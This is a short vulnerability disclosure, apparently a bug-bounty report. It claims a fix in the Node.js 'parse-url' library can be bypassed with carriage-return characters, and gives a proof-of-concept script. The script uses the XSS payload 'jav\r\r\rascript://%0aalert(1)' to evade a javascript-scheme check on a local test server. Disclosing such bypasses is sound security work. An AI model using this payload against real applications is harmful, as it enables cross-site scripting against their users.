last fix can be bypass because in this line we should consider the case \r\r
or even \r
too.
const http = require("http");
const parseUrl = require("parse-url");
const url = parseUrl('jav\r\r\rascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
response.writeHead(200);
if (url.scheme !== "javascript" && url.scheme !== null) {
response.end("<a href>Wowww!</a>" );
}
else{
response.end("Nooo!");
}
});
server.listen(80, "127.0.0.1",function(){
console.log("http://"+this.address().address+":"+this.address().port);
});